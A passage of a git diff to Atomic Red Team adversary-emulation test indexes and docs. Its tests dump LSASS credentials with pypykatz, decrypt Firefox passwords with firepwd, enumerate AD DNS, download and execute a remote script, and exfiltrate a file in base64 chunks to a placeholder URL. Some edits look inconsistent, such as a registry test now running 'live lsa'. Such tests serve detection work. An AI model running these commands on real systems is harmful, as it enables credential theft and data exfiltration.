"https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" - description: 'Firefox profile directory must be present ' @@ -85696,36 +85701,52 @@ credential-access: New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - - description: 'Pip must be installed. + - description: 'Computer must have venv configured at #{venv_path} + + ' + prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit + 1 } + + ' + get_prereq_command: 'py -m venv "#{venv_path}" + + ' + - description: 'Firepwd must exist at #{Firepwd_Path} + + ' + prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} ' - prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip -v) {exit 0} else {exit 1} - get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" - -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" - -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest - \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd - /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" - - description: "Pycryptodome library must be installed \n" - prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip show pycryptodome) {exit 0} else {exit 1} get_prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"} + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" + - description: "Pycryptodome library must be installed \n" + prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit + 0} else {exit 1} + + ' + get_prereq_command: 'if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe + install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | + out-null} else {write-host "Visual Studio Build Tools (C++ Support) must + be installed to continue gathering this prereq"} + + ' - description: "Pyasn1 library must be installed \n" - prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip show pyasn1) {exit 0} else {exit 1} - get_prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."} + prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else + {exit 1} + + ' + get_prereq_command: 'if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe + install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} + else {write-host "Visual Studio Build Tools (C++ Support) must be installed + to continue gathering this prereq."} + + ' executor: name: powershell command: | $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" - cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} + cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} cat #{Out_Filepath} cleanup_command: "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue \ \n" @@ -87023,42 +87044,50 @@ credential-access: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes to the screen. + + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. supported_platforms: - windows - dependency_executor_name: command_prompt + input_arguments: + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001 + dependency_executor_name: powershell dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: | - py -3 --version >nul 2>&1 - exit /b %errorlevel% + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } + + ' get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - - description: 'Computer must have pip installed + - description: 'Computer must have venv configured at #{venv_path} ' - prereq_command: | - py -3 -m pip --version >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" - -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" - -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest - \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd - /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" - - description: 'pypykatz must be installed and part of PATH + prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit + 1 } ' - prereq_command: | - pypykatz -h >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'pip install pypykatz + get_prereq_command: 'py -m venv "#{venv_path}" + + ' + - description: "pypykatz must be installed \n" + prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction + SilentlyContinue) { exit 0 } else { exit 1 } + + ' + get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir + pypykatz 2>&1 | Out-Null ' executor: - command: 'pypykatz live lsa + command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n" + cleanup_command: 'del "%temp%\nanodump.dmp" > nul 2> nul ' name: command_prompt @@ -99594,40 +99623,47 @@ discovery: description: hostname or ip address to connect to. type: string default: 192.168.1.1 + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018 dependency_executor_name: powershell dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: 'if (python --version) {exit 0} else {exit 1} + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } ' get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - - description: 'Computer must have pip installed + - description: 'Computer must have venv configured at #{venv_path} ' - prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} + prereq_command: 'if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit + 1 } ' - get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" - -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" - -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest - \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd - /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" - - description: 'adidnsdump must be installed and part of PATH + get_prereq_command: 'py -m venv "#{venv_path}" ' - prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} + - description: 'adidnsdump must be installed ' - get_prereq_command: 'pip3 install adidnsdump + prereq_command: 'if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction + SilentlyContinue) { exit 0 } else { exit 1 } + + ' + get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir + adidnsdump 2>&1 | Out-Null ' executor: - command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} + command: '"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} + --print-zones #{host_name} ' name: command_prompt @@ -100068,7 +100104,8 @@ discovery: - description: 'Check if python exists on the machine ' - prereq_command: 'if (python --version) {exit 0} else {exit 1} + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } ' get_prereq_command: | @@ -112282,6 +112319,38 @@ exfiltration: ' name: sh + - name: Network-Based Data Transfer in Small Chunks + auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f + description: Simulate transferring data over a network in small chunks to evade + detection. + supported_platforms: + - windows + input_arguments: + source_file_path: + description: Path to the source file to transfer. + type: path + default: "[User specified]" + destination_url: + description: URL of the destination server. + type: url + default: http://example.com + chunk_size: + description: Size of each data chunk (in KB). + type: integer + default: 1024 + executor: + name: powershell + elevation_required: false + command: | + $file = [System.IO.File]::OpenRead(#{source_file_path}) + $chunkSize = #{chunk_size} * 1KB + $buffer = New-Object Byte[] $chunkSize + + while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) { + $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead) + Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk + } + $file.Close() T1537: technique: x_mitre_platforms: diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml index 4c4cfa6662..7bef70418a 100644 --- a/atomics/Indexes/linux-index.yaml +++ b/atomics/Indexes/linux-index.yaml @@ -30298,7 +30298,8 @@ execution: which_python=$(which python || which python3 || which python3.9 || which python2) $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)' name: sh - cleanup_command: "rm #{payload_file_name} \n" + cleanup_command: "rm #{payload_file_name} \npip-autoremove pypykatz >nul 2> + nul\n" - name: Execute Python via scripts auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 description: Create Python file (.py) that downloads and executes shell script diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index f662d099ab..636f33218f 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -67908,44 +67908,51 @@ credential-access: elevation_required: true - name: Registry parse with pypykatz auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 - description: 'Parses registry hives to obtain stored credentials + description: | + Parses registry hives to obtain stored credentials. - ' + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. supported_platforms: - windows - dependency_executor_name: command_prompt + input_arguments: + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002 + dependency_executor_name: powershell dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: | - py -3 --version >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'echo "Python 3 must be installed manually" + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } ' - - description: 'Computer must have pip installed + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null + invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" + Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait + - description: 'Computer must have venv configured at #{venv_path} ' - prereq_command: | - py -3 -m pip --version >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'echo "PIP must be installed manually" + prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit + 1 } ' - - description: 'pypykatz must be installed and part of PATH + get_prereq_command: 'py -m venv "#{venv_path}" ' - prereq_command: | - pypykatz -h >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'pip install pypykatz + - description: "pypykatz must be installed \n" + prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction + SilentlyContinue) { exit 0 } else { exit 1 } ' - executor: - command: 'pypykatz live registry + get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir + pypykatz 2>&1 | Out-Null ' + executor: + command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n" name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -70018,14 +70025,16 @@ credential-access: auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381 description: "Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.\nUpon successful execution, the decrypted credentials - will be output to a text file, as well as displayed on screen. \n" + will be output to a text file, as well as displayed on screen. \n\nWill create + a Python virtual environment within the External Payloads folder that can + be deleted manually post test execution.\n" supported_platforms: - windows input_arguments: Firepwd_Path: description: Filepath for Firepwd.py type: string - default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py Out_Filepath: description: Filepath to output results to type: string @@ -70038,17 +70047,12 @@ credential-access: description: Filepath to python type: string default: C:\Program Files\Python310\python.exe + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004 dependency_executor_name: powershell dependencies: - - description: 'Firepwd must exist at #{Firepwd_Path} - - ' - prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} - - ' - get_prereq_command: | - New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" - description: 'Firefox profile directory must be present ' @@ -70084,36 +70088,52 @@ credential-access: New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - - description: 'Pip must be installed. + - description: 'Computer must have venv configured at #{venv_path} + + ' + prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit + 1 } + + ' + get_prereq_command: 'py -m venv "#{venv_path}" + + ' + - description: 'Firepwd must exist at #{Firepwd_Path} + + ' + prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} ' - prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip -v) {exit 0} else {exit 1} - get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" - -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" - -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest - \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd - /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" - - description: "Pycryptodome library must be installed \n" - prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip show pycryptodome) {exit 0} else {exit 1} get_prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"} + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null + Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" + - description: "Pycryptodome library must be installed \n" + prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit + 0} else {exit 1} + + ' + get_prereq_command: 'if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe + install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | + out-null} else {write-host "Visual Studio Build Tools (C++ Support) must + be installed to continue gathering this prereq"} + + ' - description: "Pyasn1 library must be installed \n" - prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (pip show pyasn1) {exit 0} else {exit 1} - get_prereq_command: | - $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) - if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."} + prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else + {exit 1} + + ' + get_prereq_command: 'if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe + install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} + else {write-host "Visual Studio Build Tools (C++ Support) must be installed + to continue gathering this prereq."} + + ' executor: name: powershell command: | $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" - cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} + cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} cat #{Out_Filepath} cleanup_command: "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue \ \n" @@ -71149,42 +71169,50 @@ credential-access: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes to the screen. + + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. supported_platforms: - windows - dependency_executor_name: command_prompt + input_arguments: + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001 + dependency_executor_name: powershell dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: | - py -3 --version >nul 2>&1 - exit /b %errorlevel% + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } + + ' get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - - description: 'Computer must have pip installed + - description: 'Computer must have venv configured at #{venv_path} ' - prereq_command: | - py -3 -m pip --version >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" - -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" - -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest - \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd - /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" - - description: 'pypykatz must be installed and part of PATH + prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit + 1 } ' - prereq_command: | - pypykatz -h >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'pip install pypykatz + get_prereq_command: 'py -m venv "#{venv_path}" + + ' + - description: "pypykatz must be installed \n" + prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction + SilentlyContinue) { exit 0 } else { exit 1 } + + ' + get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir + pypykatz 2>&1 | Out-Null ' executor: - command: 'pypykatz live lsa + command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n" + cleanup_command: 'del "%temp%\nanodump.dmp" > nul 2> nul ' name: command_prompt @@ -81068,40 +81096,47 @@ discovery: description: hostname or ip address to connect to. type: string default: 192.168.1.1 + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018 dependency_executor_name: powershell dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: 'if (python --version) {exit 0} else {exit 1} + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } ' get_prereq_command: | New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait - - description: 'Computer must have pip installed + - description: 'Computer must have venv configured at #{venv_path} ' - prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} + prereq_command: 'if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit + 1 } ' - get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" - -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\" - -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest - \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd - /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" - - description: 'adidnsdump must be installed and part of PATH + get_prereq_command: 'py -m venv "#{venv_path}" + + ' + - description: 'adidnsdump must be installed ' - prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} + prereq_command: 'if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction + SilentlyContinue) { exit 0 } else { exit 1 } ' - get_prereq_command: 'pip3 install adidnsdump + get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir + adidnsdump 2>&1 | Out-Null ' executor: - command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} + command: '"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} + --print-zones #{host_name} ' name: command_prompt @@ -81386,7 +81421,8 @@ discovery: - description: 'Check if python exists on the machine ' - prereq_command: 'if (python --version) {exit 0} else {exit 1} + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } ' get_prereq_command: | @@ -92331,7 +92367,39 @@ exfiltration: - 'Network Traffic: Network Traffic Flow' x_mitre_is_subtechnique: false identifier: T1030 - atomic_tests: [] + atomic_tests: + - name: Network-Based Data Transfer in Small Chunks + auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f + description: Simulate transferring data over a network in small chunks to evade + detection. + supported_platforms: + - windows + input_arguments: + source_file_path: + description: Path to the source file to transfer. + type: path + default: "[User specified]" + destination_url: + description: URL of the destination server. + type: url + default: http://example.com + chunk_size: + description: Size of each data chunk (in KB). + type: integer + default: 1024 + executor: + name: powershell + elevation_required: false + command: | + $file = [System.IO.File]::OpenRead(#{source_file_path}) + $chunkSize = #{chunk_size} * 1KB + $buffer = New-Object Byte[] $chunkSize + + while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) { + $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead) + Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk + } + $file.Close() T1537: technique: x_mitre_platforms: diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index b184dcd6a9..c99c245666 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -363,6 +363,8 @@ Python 3 must be installed, use the get_prereq_command's to meet the prerequisit Successful execution of this test will display multiple usernames and passwords/hashes to the screen. +Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. + **Supported Platforms:** Windows @@ -372,53 +374,55 @@ Successful execution of this test will display multiple usernames and passwords/ +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001| + #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd -pypykatz live lsa +"#{venv_path}\Scripts\pypykatz" live lsa ``` +#### Cleanup Commands: +```cmd +del "%temp%\nanodump.dmp" > nul 2> nul +``` -#### Dependencies: Run with `command_prompt`! +#### Dependencies: Run with `powershell`! ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: -```cmd -py -3 --version >nul 2>&1 -exit /b %errorlevel% +```powershell +if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: -```cmd +```powershell New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait ``` -##### Description: Computer must have pip installed +##### Description: Computer must have venv configured at #{venv_path} ##### Check Prereq Commands: -```cmd -py -3 -m pip --version >nul 2>&1 -exit /b %errorlevel% +```powershell +if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: -```cmd -New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null -invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" -invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" -cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" -cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" +```powershell +py -m venv "#{venv_path}" ``` -##### Description: pypykatz must be installed and part of PATH +##### Description: pypykatz must be installed ##### Check Prereq Commands: -```cmd -pypykatz -h >nul 2>&1 -exit /b %errorlevel% +```powershell +if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: -```cmd -pip install pypykatz +```powershell +& "#{venv_path}\Scripts\pip.exe" 